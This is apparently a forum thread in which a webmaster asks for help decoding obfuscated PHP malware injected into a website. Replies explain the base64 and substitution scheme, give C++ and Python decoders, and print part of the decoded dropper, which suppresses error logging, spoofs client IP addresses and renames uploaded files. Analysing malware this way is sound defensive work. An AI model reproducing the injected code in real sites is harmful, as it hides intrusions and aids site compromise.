Some numbnut is injecting malicious code into my website. Encrypted code. Anyone able to decrypt?

Calavaro

Anyone able to decrypt some encrypted PHP code?

Not sure if I should just paste the code here, or if that's a bad idea. It's about 2000 lines of encrypted PHP code.

The beginning of the code is:
Code:
<?php
 $ngwumbvz = 7336; function nspnd($yivxuusa, $hfpjxjs){$pcofutsifz = ''; for($i=0; $i < strlen($yivxuusa); $i++){$pcofutsifz .= isset($hfpjxjs[$yivxuusa[$i]]) ? $hfpjxjs[$yivxuusa[$i]] : $yivxuusa[$i];}
$yuqln="base" . "64_decode";return $yuqln($pcofutsifz);}
$gjiwpqaw = 'G1FJwxSy7HGWUOx3IrS3HOeo73IuZt5xMtqcgq8NG1FJwxSy7HGWUOeo72SFImUoIm9mhYEqNMu'.

Pastebin link to code
 
Doesn't look encrypted, looks base64 encoded though. Along with some charset mapping at the end (pseudo scrambling)

I wrote a quick C++ program to unscramble it to base64, then used Base64 Decode and Encode - Online to decode it from base64 to UTF-8

Here's the pastebin: [C++] unscrambled_injected_code_util - Pastebin.com
Here's the main function:

encoded_scrambled is the array of C strings that are listed in your file as $gjiwpqaw
unscrambler_map is an unordered_map that was listed in your file as $pjldpc

Code:
#include <iostream>
#include <fstream>
#include <cstring>
#include <iterator>
#include <unordered_map>

// Filled in from the injected file: the pieces of the $gjiwpqaw string
// (first piece as posted above, the rest omitted here) and the
// character-substitution table $pjldpc (scrambled char -> base64 char).
static const char* const encoded_scrambled[] = {
    "G1FJwxSy7HGWUOx3IrS3HOeo73IuZt5xMtqcgq8NG1FJwxSy7HGWUOeo72SFImUoIm9mhYEqNMu",
    // ... remaining pieces from the file
};
static const std::unordered_map<char, char> unscrambler_map = {
    // ... pairs from $pjldpc
};

int main(void)
{
    std::ofstream of("test.txt");
    // std::size replaces the MSVC-only _countof (needs C++17)
    for (size_t i = 0; i < std::size(encoded_scrambled); ++i)
    {
        size_t len = std::strlen(encoded_scrambled[i]);
        for (size_t j = 0; j < len; ++j)
        {
            char input = encoded_scrambled[i][j];
            auto it = unscrambler_map.find(input);
            if (it == unscrambler_map.end())
                of << input;        // not in the table: pass through unchanged
            else
                of << it->second;   // substitute the original base64 character
        }
        of << std::endl;
    }
    return 0;
}

Here's the pastebin: [PHP] unscrambled_injected_code - Pastebin.com
Here's the truncated output:

Code:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

if(isset($_SERVER))
{
    $_SERVER['PHP_SELF'] = "/";
    $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
    if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
    }
}
if(isset($_FILES))
{
    foreach($_FILES as $key => $file)
    {
        if(!strpos($file['name'], ".jpg"))
        {
            $filename = alter_macros($file['name']);
            $filename = num_macros($filename);
            $filename = xnum_macros($filename);
            $_FILES[$key]["name"] = $filename;
        }
    }
}
....
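The two-step decoding that the injected nspnd() function performs (per-character substitution, then base64_decode), as an added Python example that is not part of this thread or its pastebins; the substitution table and the sample payload below are constructed for the example, not the file's real $pjldpc and $gjiwpqaw values.

```python
import base64
import string

# Base64 alphabet in the order PHP's base64_encode emits it.
B64 = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Constructed sample payload (mimics the decoded output shown in the thread).
SAMPLE_PAYLOAD = b"@ini_set('error_log', NULL);\n@ini_set('log_errors', 0);\n"


def build_unscramble_map(shift=7):
    """Constructed stand-in for the injected file's $pjldpc table.
    Keys are scrambled characters, values the base64 characters they stand
    for; a fixed rotation here, whereas the real table is arbitrary."""
    return {B64[(i + shift) % 64]: B64[i] for i in range(64)}


def scramble(payload, unscramble_map):
    """What the obfuscator did: base64-encode, then apply the inverse table.
    Characters outside the table (e.g. '=' padding) are left untouched."""
    inverse = {orig: scr for scr, orig in unscramble_map.items()}
    encoded = base64.b64encode(payload).decode("ascii")
    return "".join(inverse.get(c, c) for c in encoded)


def unscramble_and_decode(scrambled, unscramble_map):
    """Mirror of nspnd(): per-character lookup with pass-through for
    characters not in the table, then base64_decode of the restored string."""
    restored = "".join(unscramble_map.get(c, c) for c in scrambled)
    return base64.b64decode(restored)


def decode_chunks(chunks, unscramble_map):
    """$gjiwpqaw is assembled from many '...'.'...' pieces; PHP concatenates
    them before nspnd() runs, so join first and decode once."""
    return unscramble_and_decode("".join(chunks), unscramble_map)


def demo():
    """Round trip: scramble the sample, split it into pieces like the injected
    file does, then recover the plaintext the way the C++ tool above does."""
    table = build_unscramble_map()
    scrambled = scramble(SAMPLE_PAYLOAD, table)
    chunks = [scrambled[i:i + 20] for i in range(0, len(scrambled), 20)]
    return decode_chunks(chunks, table)


if __name__ == "__main__":
    print(demo().decode())
```

With the real file, replace build_unscramble_map() with the pairs from $pjldpc and feed the pieces of $gjiwpqaw to decode_chunks(); the output is the same PHP dropper shown truncated above.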
 
Congrats, your site is pwned and likely being used for spam. Hope you have a backup you can restore, but make sure you've updated site components/plugins/etc, as they're your likely source of problems.
 
Congrats, your site is pwned and likely being used for spam. Hope you have a backup you can restore, but make sure you've updated site components/plugins/etc, as they're your likely source of problems.
Thanks, but it's already fixed. I was just curious what the code might've said. There were a couple of more file types, but the main one was the one I was most interested in.
 